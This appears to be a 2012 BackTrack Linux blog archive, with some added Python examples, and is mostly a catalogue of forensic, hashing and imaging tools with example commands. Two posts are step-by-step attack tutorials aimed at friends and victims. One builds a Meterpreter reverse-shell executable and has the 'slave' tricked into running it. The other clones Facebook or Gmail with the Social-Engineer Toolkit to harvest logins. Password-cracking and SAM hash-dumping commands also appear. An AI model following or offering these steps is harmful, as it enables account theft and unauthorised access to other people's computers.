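Added example (not part of the original post) showing what the leading dot does and does not do on Linux: only listing tools skip dot-names, the file stays readable by anyone who has permission on it, and the real restriction comes from the mode bits. The file name and contents are constructed in a temporary directory.

```python
"""Compare a dot-hidden file with a permission-protected one. Added example."""
import glob
import os
import stat
import tempfile


def dotfile_facts(secret: bytes = b"constructed secret") -> dict:
    """Create '.private.txt' in a temp dir and report what each check sees."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, ".private.txt")
        with open(path, "wb") as fh:
            fh.write(secret)

        # glob('*'), like a file manager's default view or plain 'ls', skips dot-names ...
        default_listing = [os.path.basename(p) for p in glob.glob(os.path.join(d, "*"))]
        # ... but 'Show Hidden Files', 'ls -a' and os.listdir see everything
        full_listing = os.listdir(d)

        # The dot changed nothing about who may read the file
        with open(path, "rb") as fh:
            still_readable = fh.read() == secret

        # A real restriction: owner-only permissions (0600)
        os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
        mode = stat.S_IMODE(os.stat(path).st_mode)

        return {
            "default_listing": default_listing,
            "full_listing": full_listing,
            "still_readable": still_readable,
            "mode_after_chmod": oct(mode),
            "world_readable_after_chmod": bool(mode & stat.S_IROTH),
        }


if __name__ == "__main__":
    for key, value in dotfile_facts().items():
        print(f"{key}: {value}")
```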

Wednesday, March 28, 2012

5 Useful Things in Backtrack Linux

I'm going to write up the 5 most useful things you should know in BackTrack Linux. Please check them below.

1. Username and password

BackTrack uses root as the username and toor as the password. You have to provide them at the first login after installation.

2. The startx command

Don't be shocked if you see only a black screen with a command line when you start BackTrack. BackTrack is designed to be used from the command line, but if you want the window system, you can type the startx command after you log in.

3. Metasploit Framework

The most famous tool in BackTrack is the Metasploit Framework, which is used for penetration testing of vulnerable systems. You can start it by typing /pentest/exploits/framework3/msfconsole, and there is also /pentest/exploits/framework2/msfconsole.

4. Log Out

In BackTrack, you cannot restart or shut down your computer from the X window system. What you can do when you finish using BackTrack from X is log out. To do this, click the dragon icon at the bottom left of your BackTrack desktop and then click Log Out.

5. Shutdown and restart

When you leave X, you will be back in the terminal.
To shut down your BackTrack: poweroff
To restart your BackTrack: reboot

Thursday, March 22, 2012

Hack your friend by using BackTrack 5 | Backtrack 5 tutorial

BackTrack 4 is a penetration testing distribution that runs as a live CD; it is a modified form of Linux (Ubuntu) that can be used for hacking. In this tutorial I will show you how to generate payloads with it.


In this tutorial we will be using a tool on BackTrack 4 to create a payload which we will then send to a slave. The payload is created as an exe; once the slave is social-engineered into running it, a Meterpreter session will appear on our side. We will set it up with a listener on a port, meaning we will have a shell prompt open, waiting for a connection from the slave; once this occurs we have a session and entry to the victim's machine.

Start by opening BT4's menu, then go to Backtrack, Penetration, Fast-Track, Fast-Track interactive. This will open a prompt like the one below.

[Image: tut1.png]

Choose option 7. It will then ask which exploit you want to use; choose exploit 2.

[Image: tut2.png]

It will then ask you for an IP address. You can enter either your own or the victim's; it's easier to enter our own (the listener). To obtain your IP on BackTrack 4, open a shell and type ifconfig; your IP appears after inet addr, like below.

[Image: tut3-1.png]

It will then ask you to choose a port for the listener. Choose a random port that isn't in use; for this we will use port 4444. Then choose for the payload to be compiled in exe format rather than as a shell script (text). Also choose yes to starting a listener. This basically means a blank shell will be opened, waiting for the slave to run the exe; once it is run the connection is made, and the listening shell will spawn the Meterpreter session between your machine and the victim's.

[Image: tut5.png]

At this point the payload has been created and the listener has launched. All you have to do now is locate the payload (I would advise you to rename it), social-engineer the slave into running it, and then check your listening shell for a connection. If successful you will have a Meterpreter session open and entry to the victim's machine.

Below is the location of the payload you will send.

[Image: tut7.png]

Tuesday, March 20, 2012

Hack facebook account and Gmail account using Backtrack 5

In my previous tutorial I explained “How to hack a Facebook account using phishing”. Now in this tutorial I am going to show you how to hack a Facebook account using BackTrack 5. Just follow the simple steps.

Open your BackTrack 5 terminal and type cd /pentest/exploits/set

Now open the Social-Engineer Toolkit (SET): ./set

Just hit ENTER and SET will open. Now select the 1st option (1 Social-Engineering Attacks) and hit ENTER, and after that the 2nd option (just type 2 as shown in the snapshot).

Now select the 4th option, “Tabnabbing Attack Method”, and hit ENTER.

Then select the 2nd option, “Site Cloner”, and hit ENTER.

Now here you need to add the URL of Facebook (if you want to hack Gmail then just add Gmail’s URL).

Now just hit ENTER.

Open a new terminal, type ifconfig and hit ENTER.

Now copy this IP address and open it in a browser.

Here I am just typing a test email and password to see whether it works or not.

Now hit ENTER and switch back to our terminal: we found the email and password!
This tutorial is for educational purposes only.

Tuesday, March 6, 2012

RAM Forensics Tools -Backtrack

pdfbook.py

pdfbook.py is a utility that gathers Facebook-related information from a process dump. On a Windows system, run “pd -p [pid] > file.dump”, where [pid] is the process ID of a browser; then on a Linux system run “strings -el file.dump > fbookstrings”. Finally, run pdfbook.py on the fbookstrings file produced by the strings command.
Example usage: pdfbook.py -f fbookstrings

pdgmail

pdgmail.py is a utility similar to pdfbook.py, but instead of gathering Facebook information from process dumps, it gathers Gmail information. On a Windows system, run “pd -p [pid] > file.dump”, where [pid] is the process ID of a browser; then on a Linux system run “strings -el file.dump > gmailstrings”. Finally, run pdgmail.py on the gmailstrings file produced by the strings command.

Example usage: pdgmail.py -f gmailstrings

PTK

PTK is a forensics toolkit similar to The Sleuth Kit. It contains built-in modules to analyze nearly any type of media or file type that may be encountered in a forensics investigation. It is browser based, and first needs a MySQL database configured. Leave all fields at their defaults and use the password “toor” for the MySQL root user. It should set up successfully, at which point you need to register for the free version. Copy the license file you received into the PTK config directory at /var/www/ptk/config.
Next, log in as either admin or investigator and open a new case. Fill out the necessary information, then add an image file to begin; it can even be a RAM dump. From here, the built-in tools will help you pull information from the image(s).

Volatility

Volatility is a framework written in Python that specializes in RAM analysis. The Volatility Framework can analyze volatile memory dumps from any system type, and can provide deep insight into the state of the system while it was running. The Volatility Framework has been tested on Windows, OS X, Linux, and even Cygwin. In the example below, we use Volatility's pslist plugin to list the processes that were running on the system when the RAM image ram.img was taken.

Example Usage: volatility pslist -f ram.img

PDF Forensic Tools - Backtrack

pdfid

pdfid is a utility that can extract useful information from a PDF file. Specifically, pdfid extracts header information from the PDF such as obj, endobj, stream and other information. Some PDF exploits alter this information, so pdfid can sometimes show the user what exactly is going on inside of the PDF. In this example, we simply gather information from a PDF file called file.pdf.
Example Usage: pdfid.py file.pdf
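To show why pdfid's keyword counts are worth a look, here is an added Python scanner (not pdfid's own code) that counts the same structural keywords and risky names as whole tokens over a constructed PDF; it also resolves the `#xx` hex escapes some malicious documents use to hide a name such as /JavaScript from naive grep-style checks.

```python
import re

# Constructed minimal PDF: an /OpenAction that runs JavaScript, with the
# /JavaScript name obfuscated as /J#61vaScript (#61 is the hex code of "a").
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /S /J#61vaScript /JS (app.alert(1)) >> endobj\n"
    b"4 0 obj << /Length 5 >> stream\nhello\nendstream endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

# Structural keywords plus the names that usually mean the PDF runs code or opens something.
KEYWORDS = (b"obj", b"endobj", b"stream", b"endstream", b"/JavaScript", b"/JS",
            b"/OpenAction", b"/AA", b"/Launch", b"/EmbeddedFile")
RISKY = ("/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch", "/EmbeddedFile")

def normalize_names(data):
    """Resolve #xx hex escapes in PDF names so /J#61vaScript counts as /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes.fromhex(m.group(1).decode("ascii")), data)

def count_keywords(data):
    """Count each keyword as a whole token, like pdfid's summary table."""
    data = normalize_names(data)
    counts = {}
    for kw in KEYWORDS:
        # names start with "/" so only need a trailing boundary; bare words need both,
        # otherwise "obj" would also be counted inside every "endobj"
        before = b"" if kw.startswith(b"/") else rb"(?<![A-Za-z])"
        pat = before + re.escape(kw) + rb"(?![A-Za-z])"
        counts[kw.decode("ascii")] = len(re.findall(pat, data))
    return counts

def risky_names(counts):
    """Risky names present at least once; non-empty means the file deserves pdf-parser."""
    return [name for name in RISKY if counts.get(name, 0) > 0]
```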

pdf-parser

pdf-parser is a program used to display detailed information about a PDF file. A very useful feature is the ability to run a stream of data through a filter, such as FlateDecode and ASCIIHexDecode. These filters are sometimes used to obfuscate code in PDF files, so this feature can help expose exploit attempts. In addition to this, pdf-parser can display individual objects and data streams, as well as provide statistics for the PDF document. In the example below, we use pdf-parser to provide an overview of the file.pdf PDF file using the --stats option.

Example Usage: pdf-parser.py --stats file.pdf

peepdf

peepdf is a very thorough utility used to analyze and edit PDF documents at the byte level. It offers basic command-line usage, but also an in-depth interactive console. The command-line usage provides a basic overview of the PDF file, while the interactive console provides more powerful functions. In the first example, we use peepdf to provide an overview of file.pdf, while the second one shows how to enter interactive mode with file.pdf.

Example Usage: peepdf.py file.pdf
Example Usage: peepdf.py -i file.pdf

Password Forensics Tools - Backtrack

CmosPwd

CmosPwd is a BIOS password cracker. With support for many different models of BIOS, CmosPwd has a different cracking method for each type of BIOS. Since a BIOS password prevents you from booting that computer, it does require some physical manipulation. Once you get the hardware aspect out of the way, usage is very easy. In the following example, we kill the CMOS settings altogether.

Example Usage: cmospwd /k

fcrackzip

fcrackzip is a utility used to crack Zip file password protection. There are many Zip crackers out there, however, fcrackzip excels in speed and features, especially the brute force option. It is very easy to use, and in the examples below, we use it to crack a zip file called crack.zip using a brute force method and a dictionary based attack taking passwords from passwords.txt.

Example Usage: fcrackzip -b crack.zip
Example Usage: fcrackzip -D -p passwords.txt crack.zip

samdump

samdump is a utility that can extract password hashes from SAM files. SAM files are the files on Windows-based systems that contain the passwords for local users. By using samdump, you can retrieve the password hashes, and then use them for cracking with another program. In this example, we retrieve hashes from an exported SAM file named sam.file.

Example Usage: samdump sam.file

Network Forensics

driftnet

Driftnet is a network utility that sniffs traffic for images and other media, and displays them in an X window. This is useful during investigations where users’ Internet habits are being monitored. Rather than sniffing all traffic with utilities like Wireshark, Driftnet makes it easier by automatically picking out images and media and displaying them to the user. In the example below, we use the wireless interface wlan0 in promiscuous mode to capture traffic, and instruct driftnet to be verbose in its output.

Example Usage: driftnet -i wlan0 -v

p0f

p0f is a passive host identifier. p0f uses a fingerprinting technique that looks at the structure of TCP/IP packets from the host in order to guess the operating system and other properties of the host. What sets p0f apart from other host analyzers is that p0f is completely passive. All the host has to do is connect to the same network or be contacted by another host on the network. The packets generated through these transactions give p0f enough data to guess the system. Note that you need a file containing fingerprints in order to identify hosts. In this example, we read fingerprints from /etc/p0f/p0f.fp and listen on wlan0 via libpcap.

Example Usage: p0f -f /etc/p0f/p0f.fp -i wlan0

tcpreplay

tcpreplay is a suite of network utilities that can take previously sniffed traffic and replay the packets onto the live network. This is often used for testing devices on the network, such as firewalls or Intrusion Prevention/Detection Systems (IPS/IDS). The suite itself consists of tcpprep, tcprewrite, tcpreplay, tcpreplay-edit, tcpbridge, and tcpcapinfo.

tcpprep: analyze packet capture files to determine client/server and create caches for use by tcpreplay and tcprewrite
tcprewrite: edit packet capture files in Layer 2 headers
tcpreplay: inject packet capture files back into the live network
tcpreplay-edit: replay and edit files into the network
tcpbridge: bridge two sections of a network together using tcprewrite
tcpcapinfo: decode raw packet capture files and debug them

Wireshark

Wireshark is the famous packet capture and analysis program that has been used by thousands of professionals and amateurs alike. The program allows users to listen in on a network interface using libpcap, and logs the traffic sniffed. In addition to capturing the data, Wireshark provides an easy, graphical method to filter and analyze the traffic. This includes following TCP/IP streams, filtering out ARP or broadcast packets, and virtually any other filtering option you can imagine.

Xplico

Xplico is a Network Forensic Analysis Tool (NFAT) that specializes in extracting application data from packet capture files. Although it includes a live traffic capture feature, it is best suited for pcap analysis. Xplico can extract email, HTTP, VoIP, FTP, and other data directly from the pcap file, and presents it to the user as the original application data. For example, it can reconstruct an image sent via FTP from the packet capture of the FTP session. In the example below, we use Xplico to decode the information from capture.pcap.

Example Usage: xplico -m pcap -f capture.pcap

Forensic Suites - Backtrack

ptk

PTK is described in full under RAM Forensics Tools above; the same setup (MySQL database, license file in /var/www/ptk/config, then log in, open a case and add an image) applies here.

setup autopsy

Autopsy is a GUI (uses web interface) to tools found in the Sleuthkit forensics toolkit. Autopsy specializes in analyzing disk images, and can retrieve information from them using search or browse functions. For a tutorial on retrieving “deleted” information from a disk, take a look at this Autopsy Tutorial.

sleuthkit

Sleuthkit is a forensic toolkit containing many utilities that can be used in a digital forensics investigation. Sleuthkit is the official successor of The Coroner’s Toolkit (TCT). Sleuthkit itself is not a program; rather, it is the name given to a collection of many programs. Some of the included utilities are: ils, blkls, fls, fsstat, ffind, mactime, disk_stat. The example below shows how to use mactime to list files that have been accessed since 1/1/2011. mactime works from a body file, so one is first generated by recursively listing the image with fls (image.dd stands in for your disk image):

Example usage: fls -r -m / image.dd > body.txt
Example usage: mactime -y -d -b body.txt 2011-01-01

Forensic Imaging Tools

air

AIR, or Automated Image and Restore, is a utility used to create forensics-grade disk images from devices. AIR itself is a GUI frontend for dd/dc3dd, which is the program that actually creates the image. On Backtrack, when you first select air, it will download and compile the necessary components to run the program. From here, the GUI is easy to use.

dc3dd

dc3dd is an altered version of dd, the utility used for low-level disk operations. dc3dd contains several features that are of great use to forensic investigators, including features that help safeguard the original disk being copied. The example below shows how to split a large disk image into smaller pieces, which is extremely useful when dealing with image files that are too large to be moved around easily. It takes /dev/sda as the input file, calculates hashes for the individual new files and the original large file, splits the large file into 2 GB pieces with “000” as the suffix in the filename, logs all data to /root/Desktop/log.txt, and outputs the smaller files to /root/Desktop/images.
Example usage: dc3dd if=/dev/sda progress=on hashconv=after hash=md5,sha1 hashwindow=2GB splitformat=000 split=2GB log=/root/Desktop/log.txt bs=512 iflag=direct conv=noerror,sync of=/root/Desktop/images
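What the split, splitformat and per-window hashing options above amount to, as an added Python example that is not dc3dd's code: the input is cut into numbered .000, .001, ... pieces, each piece is hashed on its own, the whole input is hashed as one stream, and the pieces are then re-hashed in order to prove they reassemble to the original. The raw-device concerns (iflag=direct, conv=noerror,sync) are outside what this example covers.

```python
import hashlib
import os
import tempfile

def image_and_split(src_path, out_prefix, split_size, hash_names=("md5", "sha1")):
    """Copy src_path into out_prefix.000, .001, ... of at most split_size bytes
    (dc3dd split=/splitformat=000), hashing every piece and the whole input."""
    whole = {h: hashlib.new(h) for h in hash_names}
    pieces = []
    with open(src_path, "rb") as src:
        index = 0
        while True:
            chunk = src.read(split_size)
            if not chunk:
                break
            piece = "%s.%03d" % (out_prefix, index)
            with open(piece, "wb") as out:
                out.write(chunk)
            for h in hash_names:
                whole[h].update(chunk)
            per_piece = {h: hashlib.new(h, chunk).hexdigest() for h in hash_names}
            pieces.append((piece, len(chunk), per_piece))
            index += 1
    return pieces, {h: whole[h].hexdigest() for h in hash_names}

def verify_reassembly(pieces, whole_hashes):
    """Hash the pieces in order as one stream; must match the whole-input hash."""
    running = {h: hashlib.new(h) for h in whole_hashes}
    for piece, _, _ in pieces:
        with open(piece, "rb") as f:
            data = f.read()
        for h in running:
            running[h].update(data)
    return {h: running[h].hexdigest() == whole_hashes[h] for h in running}

def demo():
    """Constructed 2560-byte 'device' split into 1024-byte pieces (3 files)."""
    with tempfile.TemporaryDirectory() as work:
        src = os.path.join(work, "disk.raw")
        with open(src, "wb") as f:
            f.write(bytes(range(256)) * 10)
        pieces, whole = image_and_split(src, os.path.join(work, "images"), 1024)
        checks = verify_reassembly(pieces, whole)
        return [size for _, size, _ in pieces], checks
```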

ddrescue

ddrescue is a tool used to copy data from one file or device to another. In the case of a damaged device, it attempts to reconstruct the damaged areas, unlike dd, which simply fills them with zeros. ddrescue can also merge several damaged copies of a file together, creating a single copy of the file with (hopefully) no damage. Here is an example of ddrescue being used, as found on its website. Together, these commands rescue a disk containing 3 ext2 partitions, using a logfile and e2fsck to check the filesystems.

Example usage: ddrescue -f -n /dev/hda /dev/hdb logfile
Example usage: ddrescue -d -f -r3 /dev/hda /dev/hdb logfile
Example usage: fdisk /dev/hdb
Example usage: e2fsck -v -f /dev/hdb1
Example usage: e2fsck -v -f /dev/hdb2

ewfacquire

ewfacquire is a tool used to create disk images in the EWF format. EWF-formatted images are used in several forensic toolkits, including EnCase and FTK (Forensic Toolkit). It supports several message digests, including MD5 and SHA1. The example below shows ewfacquire creating an image from /dev/sdb1, computing a SHA1 message digest, and logging data to /root/Desktop/log.txt.

Example usage: ewfacquire -d sha1 -l /root/Desktop/log.txt /dev/sdb1

Forensic Hashing Tools

hashdeep

Hashdeep is a utility that can compute hashes for many files, looking recursively through directories (with -r) and computing hashes for each file found. It also contains features to compare and audit message digests. By default, it computes the MD5 and SHA256 hash of the files, although other types can be specified. Available hash types are MD5, SHA1, SHA256, Tiger, and Whirlpool. The example below recursively generates MD5 and SHA256 hashes (the default when no -c is given) for files in the /root/Desktop/files/ directory.

Example usage: hashdeep -r -c md5,sha256 /root/Desktop/files/

md5deep

md5deep is a tool used to compute and compare MD5 message digests. The example below recursively creates MD5 message digests of the files found under /root/Desktop/
Example usage: md5deep -r /root/Desktop/

sha1deep

Like md5deep, sha1deep is used to compute and compare message digests. sha1deep deals with SHA1 digests. The usage is the same as md5deep, and the example below creates SHA1 digests of the files found in /root/Desktop/
Example usage: sha1deep /root/Desktop/*

sha256deep

Like md5deep, sha256deep is used to compute and compare message digests. sha256deep deals with SHA256 digests. The usage is the same as md5deep, and the example below creates SHA256 digests of the files found in /root/Desktop/

Example usage: sha256deep /root/Desktop/*

tigerdeep

Like md5deep, tigerdeep is used to compute and compare message digests. tigerdeep deals with Tiger digests. The usage is the same as md5deep, and the example below creates Tiger digests of the files found in /root/Desktop/

Example usage: tigerdeep /root/Desktop/*

whirlpooldeep

Like md5deep, whirlpooldeep is used to compute and compare message digests. whirlpooldeep deals with Whirlpool digests. The usage is the same as md5deep, and the example below creates Whirlpool digests of the files found in /root/Desktop/

Example usage: whirlpooldeep /root/Desktop/*